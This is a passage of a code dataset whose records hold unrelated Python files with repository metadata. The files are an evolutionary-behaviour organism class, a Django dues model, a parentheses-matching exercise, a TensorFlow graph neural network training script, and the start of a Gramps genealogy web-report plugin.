parameters\n\t\tstuBehaviorsInfo.set_num_hidden_nodes(json_data.get_num_hidden_nodes())\n\t\tstuBehaviorsInfo.set_num_output_nodes(json_data.get_num_output_nodes())\n\t\tstuBehaviorsInfo.set_num_firing_hidden_nodes(json_data.get_num_firing_hidden_nodes())\n\n\t\tstuBehaviorsInfo.set_net_one_magnitude_slope(json_data.get_net_one_magnitude_slope())\n\t\tstuBehaviorsInfo.set_net_one_magnitude_intercept(json_data.get_net_one_magnitude_intercept())\n\t\tstuBehaviorsInfo.set_net_one_neutral_magnitude(json_data.get_net_one_neutral_magnitude())\n\n\t\tstuBehaviorsInfo.set_net_two_neutral_magnitude(json_data.get_net_two_neutral_magnitude())\n\t\tstuBehaviorsInfo.set_net_two_selection_strength_exponent(json_data.get_net_two_selection_strength_exponent())\n\t\tstuBehaviorsInfo.set_net_two_selection_strength_multiplier(json_data.get_net_two_selection_strength_multiplier())\n\t\tstuBehaviorsInfo.set_net_two_num_hidden_nodes(json_data.get_net_two_num_hidden_nodes())\n\n\t\tstuBehaviorsInfo.set_ml_learning_rate(json_data.get_ml_learning_rate())\n\t\tstuBehaviorsInfo.set_ml_num_slots(json_data.get_ml_num_slots())\n\t\tstuBehaviorsInfo.set_ml_reward_multiplier(json_data.get_ml_reward_multiplier())\n\t\tstuBehaviorsInfo.set_ml_reward_exponent(json_data.get_ml_reward_exponent())\n\t\tstuBehaviorsInfo.set_ml_pessimism(json_data.get_ml_pessimism())\n\t\tstuBehaviorsInfo.set_ml_extinction(json_data.get_ml_extinction())\n\t\tstuBehaviorsInfo.set_ml_epsilon(json_data.get_ml_epsilon())\n\t\tstuBehaviorsInfo.set_ml_discount_rate(json_data.get_ml_discount_rate())\n\n\t\treturn stuBehaviorsInfo\n\n\tdef reset_state(self):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef is_ready_to_emit(self):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef emit_behavior(self):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef set_selection(self, selectionParameter, value):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef load_selection_info(self, json_data):\n\n\t\tstuSelectionInfo = SelectionInfo()\n\t\tstuSelectionInfo.set_selection_method(json_data.get_selection_method())\n\t\tstuSelectionInfo.set_continuous_function_form(json_data.get_continuous_function_form())\n\n\t\t# High Phenotype------------------------------------------------------(added to implement punishment)\n\t\tstuSelectionInfo.set_high_phenotype(json_data.get_high_phenotype())\n\n\t\t# Fitness Landscape---------------------------------------------------(added to implement punishment)\n\t\tstuSelectionInfo.set_fitness_landscape(json_data.get_fitness_landscape())\n\t\tstuSelectionInfo.set_matchmaking_method(json_data.get_matchmaking_method())\n\n\t\treturn stuSelectionInfo\n\n\tdef load_recombination_info(self, json_data):\n\n\t\tstuRecombinationInfo = RecombinationInfo()\n\t\tstuRecombinationInfo.set_method(json_data.get_recombination_method())\n\n\t\tif json_data.get_recombination_method() == Constants.RECOMBINATION_METHOD_CROSSOVER:\n\t\t\tstuRecombinationInfo.set_points(json_data.get_crossover_points())\n\n\t\treturn stuRecombinationInfo\n\n\tdef load_mutation_info(self, json_data):\n\n\t\tstuMutationInfo = MutationInfo()\n\t\tstuMutationInfo.set_method(json_data.get_mutation_method())\n\n\t\tif stuMutationInfo.get_method() == 
Constants.MUTATION_METHOD_GAUSSIAN:\n\t\t\tstuMutationInfo.set_sd(json_data.get_gaussian_mutation_sd())\n\t\t\tstuMutationInfo.set_boundary(json_data.get_mutation_boundary())\n\n\t\tstuMutationInfo.set_rate(json_data.get_mutation_rate())\n\n\t\t# Redundant info needed by the Mutator object\n\t\tif json_data.use_gray_codes():\n\t\t\tstuMutationInfo.set_use_gray_codes(True)\n\t\telse:\n\t\t\tstuMutationInfo.set_use_gray_codes(False)\n\t\tstuMutationInfo.set_high_phenotype(json_data.get_high_phenotype())\n\t\tstuMutationInfo.set_low_phenotype(json_data.get_low_phenotype())\n\n\t\treturn stuMutationInfo\n\n\tdef get_sdcolor(self):\n\t\treturn self.m_currentSDColor\n\n\tdef get_sdcolor_str(self):\n\t\treturn Converter.convert_sd_color_to_string(self.m_currentSDColor)\n\n\tdef set_sdcolor(self, value):\n\t\traise NotImplementedError\n\n\tdef load_RW_info(self, json_data):\n\n\t\tstuRWInfo = RescorlaWagnerParameters()\n\n\t\tstuRWInfo.set_alpha(json_data.get_alpha())\n\t\tstuRWInfo.set_beta_0(json_data.get_beta_0())\n\t\tstuRWInfo.set_beta_1(json_data.get_beta_1())\n\t\tstuRWInfo.set_berg_a(1) # Hard coded to 1 for now.\n\t\tstuRWInfo.set_lambda(1) # Hard coded to 1 for now.\n\n\t\treturn stuRWInfo\n","repo_name":"misterriley/PyETBD","sub_path":"src/orgs/AnOrganism.py","file_name":"AnOrganism.py","file_ext":"py","file_size_in_byte":7479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25751003092","text":"from django.db import models\n\n# Create your models here.\nDUES_TYPE = [\n\t('NEWQ1', 'New member - Jan to Dec'),\n\t('NEWQ2', 'New member - Apr to Dec'),\n\t('NEWQ3', 'New member - Jul to Dec'),\n\t('NEWQ4', 'New member - Oct to Dec'),\n\t('RENEW', 'Renewal - Jan to Dec'),\n]","repo_name":"pineapplejuice/earc2-members","sub_path":"helpers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28026990567","text":"data = \"\"\"Given a string containing just the characters '(' and ')', return the length of the longest valid (well-formed) parentheses substring\nExample 1:\n\nInput: s = \"(()\"\nOutput: 2\nExplanation: The longest valid parentheses substring is \"()\".\nExample 2:\n\nInput: s = \")()())\"\nOutput: 4\nExplanation: The longest valid parentheses substring is \"()()\".\n\n\"\"\"\n\n\nclass Solution:\n\n def longestValidParentheses(self, s: str) -> int:\n stack = []\n max_1 = 0\n count = 0\n for c in s:\n if c == '(':\n stack.append('(')\n elif c == ')' and stack:\n if stack[-1] == '(':\n count += 2\n stack.pop()\n else:\n count = 0\n if max_1 < count:\n max_1 = count\n max_2 = 0\n count = 0\n if max_1 != len(s):\n stack = []\n for c in s[::-1]:\n if c == ')':\n stack.append(')')\n elif c == '(' and stack:\n if stack[-1] == ')':\n count += 2\n stack.pop()\n else:\n count = 0\n if max_2 < count:\n max_2 = count\n print(max_1, max_2)\n return max_1 if max_1 <= max_2 and max_2 != 0 else max_2\n\n\nprint(Solution().longestValidParentheses(\")()())\"))\n","repo_name":"laxman590249/Data-Structures","sub_path":"DataStructures/DP/maximum_valid_para.py","file_name":"maximum_valid_para.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21445685063","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nimport numpy as np\nimport math\nimport molecule_predictionv2_0 as mp\n\n\n# 
In[5]:\n\n\nimport tensorflow as tf\n\n\n# In[6]:\n\n\ndat = mp.molecule_prediction_data_wrapper()\n\n\n# In[21]:\n\n\natom_vector_size = 1024\nnum_timesteps = 5\nhidden_unit_size = 1024\nbatchSize = 32\nnum_epochs = 200\nbatch_gen = dat.batch_gen\ndataset = tf.data.Dataset. from_generator(batch_gen.generate, (tf.float32,tf.float32),\n output_shapes= (tf.TensorShape([30,1054]), \n tf.TensorShape([3]))) \ndataset = dataset.shuffle(buffer_size = batchSize*10) \ndataset = dataset.repeat(num_epochs).batch(batchSize)\ndataset = dataset.prefetch(buffer_size = 2)\ndata_source = dataset.make_one_shot_iterator()\nbatch_in, batch_y = data_source.get_next()\n\n\n# In[8]:\n\n\nwith tf.variable_scope('message_transform_network'):\n hidden1 = tf.keras.layers.Dense(2048,activation='relu')\n hidden1.build((None,atom_vector_size))\n hidden2 = tf.keras.layers.Dense(2048,activation='tanh')\n hidden2.build((None,2048))\n hidden3 = tf.keras.layers.Dense(1024,activation='relu')\n hidden3.build((None,2048))\n out_message = tf.keras.layers.Dense(atom_vector_size)\n out_message.build((None, 1024))\ndef apply_edge_neural_network_transform(input):\n return out_message.apply(hidden3.apply(hidden2.apply(hidden1.apply(input))))\n\n\n# In[9]:\n\n\ndef get_messages(ordered_atoms_vector, adjacency_matrix):\n transformed = apply_edge_neural_network_transform(ordered_atoms_vector)\n return tf.matmul(adjacency_matrix,transformed)\n\n\n# In[10]:\n\n\nwith tf.variable_scope(\"RecusiveUnitLTSM\"):\n shared_lstm_cell = tf.keras.layers.LSTMCell(hidden_unit_size);\ndef iterate_time_step(states_vectors_t, messages):\n (outputs_t, states_vectors_t_1) = shared_lstm_cell(messages, states_vectors_t)\n return outputs_t, states_vectors_t_1\n\n\n# In[11]:\n\n\ninitial_state1 = tf.Variable(np.random.normal(size=(1,hidden_unit_size)),\n trainable=True,dtype=tf.float32);\ninitial_state2 = tf.Variable(np.random.normal(size=(1,hidden_unit_size)),\n trainable=True,dtype=tf.float32);\ninitial_states1 = tf.reshape(tf.tile(initial_state1, (1,tf.shape(batch_in)[1])),\n [tf.shape(batch_in)[1], hidden_unit_size])\ninitial_states2 = tf.reshape(tf.tile(initial_state2, (1,tf.shape(batch_in)[1])),\n [tf.shape(batch_in)[1], hidden_unit_size])\ninitial_states = (initial_states1,initial_states2)\n\n\n# In[12]:\n\n\ndef extract_atom_vectors_ad_matrix(input_mat):\n num_atoms = tf.shape(input_mat)[0]\n return tf.slice(input_mat,[0,0],[num_atoms,atom_vector_size]), tf.slice(input_mat,[0,atom_vector_size],[num_atoms,num_atoms])\n\n\n# In[13]:\n\n\ndef graph_neural_network(concatenated_input_mat):\n global initial_states\n initial_output,ad_matrix = extract_atom_vectors_ad_matrix(concatenated_input_mat)\n outputs_x = initial_output\n states_vectors_x = initial_states\n for i in range(num_timesteps):\n messages = get_messages(outputs_x, ad_matrix)\n outputs_x, states_vectors_x = iterate_time_step(states_vectors_x,messages) \n final_outputs = outputs_x\n out = tf.reduce_sum(final_outputs, axis=0)\n return out \n\n\n# In[25]:\n\n\nfinal_outputs=tf.map_fn(graph_neural_network,batch_in)\nprediction = tf.keras.layers.Dense(3)(final_outputs)\nwith tf.name_scope(\"loss\"):\n loss = tf.losses.mean_squared_error(batch_y, prediction)\n\n\n# In[15]:\n\n\nlearning_rate = 0.001\nwith tf.name_scope(\"train\"):\n global training_op\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n training_op = optimizer.minimize(loss)\n\n\n# In[27]:\n\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n init.run()\n for epoch in 
range(num_epochs):\n for iteration in range(batch_gen.samples// batchSize):\n _,loss_value = sess.run([training_op,loss])\n if iteration % 500 == 0:\n print(\"Epoch \" + str(epoch) + \" Step \" + str(iteration) + \" loss \" + str(loss_value))\n if epoch % 20 == 0:\n save_path = saver.save(sess, \"../models/graph_model_\" + str(epoch) + \".ckpt\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"neilhazra/KaggleMoleculePrediction","sub_path":"MoleculePrediction/Preliminary/GraphNeuralNetworkTest.py","file_name":"GraphNeuralNetworkTest.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37521617327","text":"from __future__ import print_function, division\nfrom functools import partial\nimport os\nimport sys\nimport re\nimport copy\nimport time\nimport shutil\nimport codecs\nimport tarfile\nimport tempfile\nif sys.version_info[0] < 3:\n\tfrom cStringIO import StringIO\n\tstring_types = basestring\nelse:\n\tfrom io import StringIO\n\tstring_types = str\nfrom textwrap import TextWrapper\nfrom unicodedata import normalize\nfrom collections import defaultdict\nfrom xml.sax.saxutils import escape\nif (sys.version_info[0] < 3):\n\timport urlparse, urllib\nelse:\n\timport urllib, urllib.parse as urlparse\nimport zipfile\n\nfrom operator import itemgetter\nfrom decimal import Decimal, getcontext\ngetcontext().prec = 8\n\n\n#------------------------------------------------\n# Set up logging\n#------------------------------------------------\nimport logging\nlog = logging.getLogger(\".DynamicWeb\")\n# The log initialization shall be performed after Gramps start-up (i.e. not here)\n\n#------------------------------------------------\n# Gramps module\n#------------------------------------------------\n\n\nfrom gramps.gen.const import IMAGE_DIR, GRAMPS_LOCALE as glocale\ntry:\n\t_trans = glocale.get_addon_translator(__file__)\nexcept ValueError:\n\t_trans = glocale.translation\n_ = _trans.sgettext\n\nfrom gramps.version import VERSION, VERSION_TUPLE\nDWR_VERSION_410 = (VERSION_TUPLE[0] >= 4) and (VERSION_TUPLE[1] >= 1)\nDWR_VERSION_412 = (VERSION_TUPLE[0] >= 4) and (VERSION_TUPLE[1] >= 1) and (VERSION_TUPLE[2] >= 2)\nDWR_VERSION_420 = (VERSION_TUPLE[0] >= 4) and (VERSION_TUPLE[1] >= 2)\nfrom gramps.gen.lib import (ChildRefType, Date, EventType, FamilyRelType, Name,\n\t\t\t\t\t\t\tNameType, Person, UrlType, NoteType,\n\t\t\t\t\t\t\tEventRoleType, Family, Event, Place, Source,\n\t\t\t\t\t\t\tCitation, MediaObject, Repository, Note, Tag,\n\t\t\t\t\t\t\tMediaRef, Location)\nif (DWR_VERSION_410):\n\tfrom gramps.gen.lib import PlaceType\nfrom gramps.gen.lib.date import Today\nfrom gramps.gen.const import PROGRAM_NAME, URL_HOMEPAGE\nfrom gramps.gen.plug.menu import (PersonOption, NumberOption, StringOption,\n\tBooleanOption, EnumeratedListOption, FilterOption,\n\tNoteOption, MediaOption, DestinationOption, ColorOption)\nfrom gramps.gen.plug.report import (Report, Bibliography)\nfrom gramps.gen.plug.report import utils as report_utils\nfrom gramps.gen.plug.report import MenuReportOptions\n\nfrom gramps.gen.utils.config import get_researcher\nfrom gramps.gen.utils.string import conf_strings\nfrom gramps.gen.utils.file import media_path_full\nfrom gramps.gen.utils.alive import probably_alive\nfrom gramps.gen.utils.db import get_source_and_citation_referents, get_birth_or_fallback, get_death_or_fallback, get_marriage_or_fallback\nfrom gramps.gen.constfunc import win, conv_to_unicode, get_curr_dir\nif (sys.version_info[0] < 
3):\n\tfrom gramps.gen.constfunc import UNITYPE\nelse:\n\tUNITYPE = str\nfrom gramps.gen.config import config\nfrom gramps.gui.thumbnails import get_thumbnail_path, run_thumbnailer\nfrom gramps.gen.utils.image import image_size, resize_to_jpeg_buffer\nfrom gramps.gen.mime import get_description\nfrom gramps.gen.display.name import displayer as _nd\nif (DWR_VERSION_412):\n\tfrom gramps.gen.display.place import displayer as _pd\nfrom gramps.gen.datehandler import get_date_formats, displayer as _dd\nfrom gramps.gen.proxy import PrivateProxyDb, LivingProxyDb\nfrom gramps.plugins.lib.libhtmlconst import _CHARACTER_SETS, _CC, _COPY_OPTIONS\n\n# import HTML Class from src/plugins/lib/libhtml.py\nfrom gramps.plugins.lib.libhtml import Html, xml_lang\n\n# import styled notes from src/plugins/lib/libhtmlbackend.py\nfrom gramps.plugins.lib.libhtmlbackend import HtmlBackend, process_spaces\n\nfrom gramps.plugins.lib.libgedcom import make_gedcom_date, DATE_QUALITY\n\nfrom gramps.plugins.webreport.narrativeweb import first_letter\n\nfrom gramps.gen.utils.place import conv_lat_lon\nfrom gramps.gui.pluginmanager import GuiPluginManager\n\nfrom gramps.gen.relationship import get_relationship_calculator\nif (DWR_VERSION_410):\n\tfrom gramps.gen.utils.location import get_main_location\n\nfrom gramps.gui.widgets.fanchart import (\n\tGENCOLOR,\n\tGRADIENTSCALE,\n\tBACKGROUND_SCHEME1,\n\tBACKGROUND_SCHEME2,\n\tBACKGROUND_GENDER,\n\tBACKGROUND_WHITE,\n\tBACKGROUND_GRAD_GEN,\n\tBACKGROUND_GRAD_AGE,\n\tBACKGROUND_SINGLE_COLOR,\n\tBACKGROUND_GRAD_PERIOD,\n)\nfrom gramps.gui.utils import hex_to_rgb\n\nSORT_KEY = glocale.sort_key\n\n#------------------------------------------------\n# constants\n#------------------------------------------------\n\n#: Maximum number of pages containing custom text\nNB_CUSTOM_PAGES = 5\n#: Maximum number of pages\nNB_TOTAL_PAGES_MAX = 15\n#: List of the pages (description, title, file name)\nPAGES_NAMES = [\n\t(_(\"Person page\"), _(\"Person\"), \"person.html\"),\n\t(_(\"Surnames index page\"), _(\"Surnames\"), \"surnames.html\"),\n\t(_(\"Individuals index page\"), _(\"Individuals\"), \"persons.html\"),\n\t(_(\"Families index page\"), _(\"Families\"), \"families.html\"),\n\t(_(\"Sources index page\"), _(\"Sources\"), \"sources.html\"),\n\t(_(\"Media index page\"), _(\"Media\"), \"medias.html\"),\n\t(_(\"Places index page\"), _(\"Places\"), \"places.html\"),\n\t(_(\"Addresses page\"), _(\"Addresses\"), \"address.html\"),\n\t(_(\"Repositories index page\"), _(\"Repositories\"), \"repositories.html\"),\n\t(_(\"SVG graphical tree\"), _(\"Tree\"), \"tree_svg.html\"),\n] + [\n\t(_(\"Custom page %(index)i\") % {\"index\": i + 1}, _(\"Custom\"), \"custom_%i.html\" % (i + 1))\n\tfor i in range(NB_CUSTOM_PAGES)\n]\n\n# Constants used as indexes in L{PAGES_NAMES}\n(PAGE_PERSON,\nPAGE_SURNAMES,\nPAGE_PERSON_INDEX,\nPAGE_FAMILY_INDEX,\nPAGE_SOURCE_INDEX,\nPAGE_MEDIA_INDEX,\nPAGE_PLACE_INDEX,\nPAGE_ADDRESS_INDEX,\nPAGE_REPOSITORY_INDEX,\nPAGE_SVG_TREE,\nPAGE_CUSTOM) = range(11)\n\n# List of the descriptions of the tree graph types\nSVG_TREE_TYPES = [\n\t_(\"Ascending tree\"),\n\t_(\"Descending tree\"),\n\t_(\"Descending tree with spouses\"),\n\t_(\"Ascending and descending tree\"),\n\t_(\"Ascending and descending tree with spouses\"),\n]\n(SVG_TREE_TYPE_ASCENDING,\nSVG_TREE_TYPE_DESCENDING,\nSVG_TREE_TYPE_DESCENDING_SPOUSES,\nSVG_TREE_TYPE_ASCDESC,\nSVG_TREE_TYPE_ASCDESC_SPOUSES) = range(len(SVG_TREE_TYPES))\nDEFAULT_SVG_TREE_TYPE = SVG_TREE_TYPE_ASCDESC\n\nSVG_TREE_SHAPES = [\n\t_(\"Vertical 
(↓)\"),\n\t_(\"Vertical (↑)\"),\n\t_(\"Horizontal (→)\"),\n\t_(\"Horizontal (←)\"),\n\t_(\"Full Circle\"),\n\t_(\"Half Circle\"),\n\t_(\"Quadrant\"),\n]\n(SVG_TREE_SHAPE_VERTICAL_TOP_BOTTOM,\nSVG_TREE_SHAPE_VERTICAL_BOTTOM_TOP,\nSVG_TREE_SHAPE_HORIZONTAL_LEFT_RIGHT,\nSVG_TREE_SHAPE_HORIZONTAL_RIGHT_LEFT,\nSVG_TREE_SHAPE_CIRCLE,\nSVG_TREE_SHAPE_HALF_CIRCLE,\nSVG_TREE_SHAPE_QUADRANT) = range(len(SVG_TREE_SHAPES))\nDEFAULT_SVG_TREE_SHAPE = SVG_TREE_SHAPE_HORIZONTAL_LEFT_RIGHT\n\nSVG_TREE_DISTRIB_ASC = [\n\t_('Size proportional to number of ancestors'),\n\t_('Homogeneous parents distribution'),\n]\nSVG_TREE_DISTRIB_DSC = [\n\t_('Size proportional to number of descendants'),\n\t_('Homogeneous children distribution'),\n]\n(SVG_TREE_DISTRIB_PROPORTIONAL,\nSVG_TREE_DISTRIB_HOMOGENEOUS) = range(len(SVG_TREE_DISTRIB_ASC))\nDEFAULT_SVG_TREE_DISTRIB = SVG_TREE_DISTRIB_PROPORTIONAL\n\nSVG_TREE_BACKGROUNDS = [\n\t_('Gender colors'),\n\t_('Generation based gradient'),\n\t_('Age based gradient'),\n\t_('Single main (filter) color'),\n\t_('Time period based gradient'),\n\t_('White'),\n\t_('Color scheme classic report'),\n\t_('Color scheme classic view'),\n]\n(SVG_TREE_BACKGROUND_GENDER,\nSVG_TREE_BACKGROUND_GENERATION,\nSVG_TREE_BACKGROUND_AGE,\nSVG_TREE_BACKGROUND_SINGLE,\nSVG_TREE_BACKGROUND_PERIOD,\nSVG_TREE_BACKGROUND_WHITE,\nSVG_TREE_BACKGROUND_SCHEME1,\nSVG_TREE_BACKGROUND_SCHEME2) = range(len(SVG_TREE_BACKGROUNDS))\nDEFAULT_SVG_TREE_BACKGROUND = SVG_TREE_BACKGROUND_GENERATION\n\n#: Templates for the website, in the form: [directory, name]\n# First template is the default one:\n# The files in the default template are used when they are not present in another template\n# Only the files that are different from the default template are present in the other templates directories\nWEB_TEMPLATE_LIST = (\n\t(\"dwr_default\", _(\"Default\")),\n\t(\"dwr_mainz\", _(\"Mainz\")),\n)\n\n\nINCLUDE_LIVING_VALUE = 99 #: Arbitrary number\n\n# Indexes in the L{DynamicWebReport.obj_dict} and L{DynamicWebReport.bkref_dict} elements\nOBJDICT_NAME = 0\nOBJDICT_GID = 1\nOBJDICT_INDEX = 2\nBKREF_CLASS = 0\nBKREF_HANDLE = 1\nBKREF_REFOBJ = 2\n\n\n_html_dbl_quotes = re.compile(r'([^\"]*) \" ([^\"]*) \" (.*)', re.VERBOSE)\n_html_sng_quotes = re.compile(r\"([^']*) ' ([^']*) ' (.*)\", re.VERBOSE)\n\ndef html_escape(text):\n\t\"\"\"Convert the text and replace some characters with a &# variant.\"\"\"\n\t# First single characters, no quotes\n\ttext = escape(text)\n\t# Deal with double quotes.\n\tm = _html_dbl_quotes.match(text)\n\twhile m:\n\t\ttext = \"%s\" \"“\" \"%s\" \"”\" \"%s\" % m.groups()\n\t\tm = _html_dbl_quotes.match(text)\n\t# Replace remaining double quotes.\n\ttext = text.replace('\"', '"')\n\t# Deal with single quotes.\n\ttext = text.replace(\"'s \", '’s ')\n\tm = _html_sng_quotes.match(text)\n\twhile m:\n\t\ttext = \"%s\" \"‘\" \"%s\" \"’\" \"%s\" % m.groups()\n\t\tm = _html_sng_quotes.match(text)\n\t# Replace remaining single quotes.\n\ttext = text.replace(\"'\", ''')\n\n\treturn text\n\n\ndef script_escape(text):\n\t\"\"\"Convert the text and escape quotes, backslashes and end-of-lines\n\t\"\"\"\n\treturn(text.\n\t\treplace(\"\\\\\", \"\\\\\\\\\").\n\t\treplace(\"'\", \"\\\\'\").\n\t\treplace(\"\\\"\", \"\\\\\\\"\").\n\t\treplace(\"\\n\", \"\\\\n\")\n\t)\n\n\ndef html_text(html):\n\t\"\"\"Get the string corresponding to an L{Html} object\"\"\"\n\tif (isinstance(html, string_types)): return(html.strip())\n\tsw = StringIO()\n\thtml.write(partial(print, file = sw), indent = \"\", tabs = 
\"\")\n\treturn(sw.getvalue().strip())\n\n\ndef format_date(date, gedcom = False, iso = False):\n\t\"\"\"Give the date as a string\n\t@param iso: If True, the date should be given in ISO format: YYYY-MM-DD\n\t@type iso: Boolean\n\t\"\"\"\n\tif (not date): return(\"\")\n\t\n\tval = \"\"\n\t\n\tif (iso):\n\t\t# TODO: export ISO dates\n\t\t# if (iso): val = DateDisplay.display(date) or \"\"\n\t\t# else: val = _dd.display(date) or \"\"\n\t\tpass\n\t\t\n\telif (gedcom):\n\t\tstart = date.get_start_date()\n\t\tif start != Date.EMPTY:\n\t\t\tcal = date.get_calendar()\n\t\t\tmod = date.get_modifier()\n\t\t\tquality = date.get_quality()\n\t\t\tif quality in DATE_QUALITY:\n\t\t\t\tqual_text = DATE_QUALITY[quality] + \" \"\n\t\t\telse:\n\t\t\t\tqual_text = \"\"\n\t\t\tif mod == Date.MOD_SPAN:\n\t\t\t\tval = \"%sFROM %s TO %s\" % (\n\t\t\t\t\tqual_text,\n\t\t\t\t\tmake_gedcom_date(start, cal, mod, None), \n\t\t\t\t\tmake_gedcom_date(date.get_stop_date(), cal, mod, None))\n\t\t\telif mod == Date.MOD_RANGE:\n\t\t\t\tval = \"%sBET %s AND %s\" % (\n\t\t\t\t\tqual_text,\n\t\t\t\t\tmake_gedcom_date(start, cal, mod, None), \n\t\t\t\t\tmake_gedcom_date(date.get_stop_date(), cal, mod, None))\n\t\t\telse:\n\t\t\t\tval = make_gedcom_date(start, cal, mod, quality)\n\t\t\t\t\n\telse:\n\t\t# Regular Gramps place displayer\n\t\tval = _dd.display(date) or \"\"\n\t\n\treturn(val)\n\n\ndef rmtree_fix(dirname):\n\t\"\"\"Windows fix: Python shutil.rmtree does not work properly on Windows.\n\tUnfortunately this fix is not completely working. Don't know why.\n\tThe strategy is to rename the directory first, in order to let Windows delete it in differed time.\n\t\"\"\"\n\t#TODO: Fix shutil.rmtree on Windows\n\ttmp = dirname + \"_removetree_tmp\"\n\tos.rename(dirname, tmp)\n\tshutil.rmtree(tmp)\n\t# Wait for rmtree to complete\n\tfor i in range(100):\n\t\tif (not os.path.exists(tmp)): break\n\t\ttime.sleep(0.1)\n\n\n\nclass DynamicWebReport(Report):\n\t\"\"\"\n\tClass DynamicWebReport\n\t\n\tExtracts information from the database and exports the data into Javascript and HTML files\n\t\n\tThe database extraction is performed by the method L{_build_obj_dict}. 
It recursively calls the methods \"_add_***\".\n\t\n\tThe database extraction builds:\n\t - indexes of the objects selected for the report as dictionaries,\n\t - for each object (of the report), references to the objects calling this object.\n\t \n\tThe indexes of the objects selected are stored as dictionaries \"obj_dict[class][handle]\",\n\tindexed by the object class,\n\tindexed by the database handle,\n\tcontaining for each report object the following information:\n\t - object file name, if any,\n\t - object name,\n\t - gramps id,\n\t - object index, starting from 0,\n\t   only counting the objects selected,\n\t   each object type is counted separately.\n\t\n\tThe references to objects are stored as dictionaries \"bkref_dict[class][handle]\",\n\tindexed by the object class,\n\tindexed by the database handle,\n\tcontaining for each report object the following information:\n\t - class of the object referencing it,\n\t - handle of the object referencing it,\n\t - reference object (MediaRef, EventRef) if any.\n\t \n\tThe report is generated by L{write_report}\n\t\"\"\"\n\n\tdef __init__(self, database, options, user):\n\t\t\"\"\"\n\t\tCreate WebReport object that produces the report.\n\n\t\tThe arguments are:\n\n\t\tdatabase - the Gramps database instance\n\t\toptions - instance of the Options class for this report\n\t\tuser - instance of a gen.user.User()\n\t\t\"\"\"\n\n\t\tReport.__init__(self, database, options, user)\n\t\tself.user = user\n\t\tmenu = options.menu\n\t\tself.link_prefix_up = True\n\t\tself.options = {}\n\n\t\tfor optname in menu.get_all_option_names():\n\t\t\tmenuopt = menu.get_option_by_name(optname)\n\t\t\tself.options[optname] = menuopt.get_value()\n\n\t\tif not self.options['incpriv']:\n\t\t\tself.database = PrivateProxyDb(database)\n\t\telse:\n\t\t\tself.database = database\n\n\t\tlivinginfo = self.options['living']\n\t\tyearsafterdeath = self.options['yearsafterdeath']\n\n\t\tif livinginfo != INCLUDE_LIVING_VALUE:\n\t\t\tself.database = LivingProxyDb(self.database, livinginfo, None, yearsafterdeath)\n\n\t\tfilters_option = menu.get_option_by_name('filter')\n\t\tself.filter = filters_option.get_filter()\n\n\t\tself.target_path = self.options['target'] #: Destination directory\n\t\tself.ext = \".html\" #: HTML files extension\n\t\tself.title = self.options['title'] #: Web site title. Web page titles are of the form \"title of the page - title of the site\"\n\n\t\tself.author = get_researcher().get_name() #: Database author name. Used in copyright text.\n\t\tif self.author:\n\t\t\tself.author = self.author.replace(',,,', '')\n\n\t\t# The following data are local copies of the options. 
Refer to the L{DynamicWebOptions} class for more details.\n\t\tself.inc_events = self.options['inc_events']\n\t\tself.inc_places = self.options['inc_places']\n\t\tself.inc_families = self.options['inc_families']\n\t\tself.inc_gallery = self.options['inc_gallery']\n\t\tself.copy_media = self.options['copy_media']\n\t\tself.inc_notes = self.options['inc_notes']\n\t\tself.print_notes_type = self.options['print_notes_type']\n\t\tself.inc_sources = self.options['inc_sources']\n\t\tself.inc_repositories = self.options['inc_repositories']\n\t\t# Repositories are not exported unless sources are exported\n\t\tself.inc_repositories = self.inc_repositories and self.inc_sources\n\t\tself.inc_addresses = self.options['inc_addresses']\n\t\tself.name_format = self.options['name_format']\n\t\tself.short_name_format = self.options['short_name_format']\n\t\tself.encoding = self.options['encoding']\n\t\tself.copyright = self.options['copyright']\n\t\tself.inc_gendex = self.options['inc_gendex']\n\t\tself.template = self.options['template']\n\t\tself.pages_number = self.options['pages_number']\n\t\tself.page_content = [\n\t\t\tself.options['page_content_%i' %i]\n\t\t\tfor i in range(self.pages_number)\n\t\t]\n\t\tself.page_name = [\n\t\t\tself.options['page_name_%i' %i]\n\t\t\tfor i in range(len(PAGES_NAMES))\n\t\t]\n\t\tself.custom_menu = [\n\t\t\tself.options['custom_menu_%i' %i]\n\t\t\tfor i in range(NB_CUSTOM_PAGES)\n\t\t]\n\t\tself.custom_note = [\n\t\t\tself.options['custom_note_%i' %i]\n\t\t\tfor i in range(NB_CUSTOM_PAGES)\n\t\t]\n\t\t# Filter pages that cannot be exported due to other options\n\t\tself.page_content = [pc for pc in self.page_content if (not(\n\t\t\t(pc == PAGE_FAMILY_INDEX and not self.inc_families) or\n\t\t\t(pc == PAGE_MEDIA_INDEX and not self.inc_gallery) or\n\t\t\t(pc == PAGE_SOURCE_INDEX and not self.inc_sources) or\n\t\t\t(pc == PAGE_REPOSITORY_INDEX and not self.inc_repositories) or\n\t\t\t(pc == PAGE_PLACE_INDEX and not self.inc_places)\n\t\t))]\n\t\tself.pages_number = len(self.page_content)\n\n\t\tself._backend = HtmlBackend()\n\t\tself._backend.build_link = self.build_link\n\n\n\tdef write_report(self):\n\t\t\"\"\"\n\t\tReport generation\n\t\t\"\"\"\n\t\t\n\t\t# Initialize the logger\n\t\t# This initialization shall be performed after Gramps has start-up\n\t\t# import importlib\n\t\t# logging = importlib.reload(logging)\n\t\t# global log\n\t\t# log = logging.getLogger(\".DynamicWeb\")\n\t\t\n\t\t# Create directory\n\t\tdir_name = self.target_path\n\t\tif 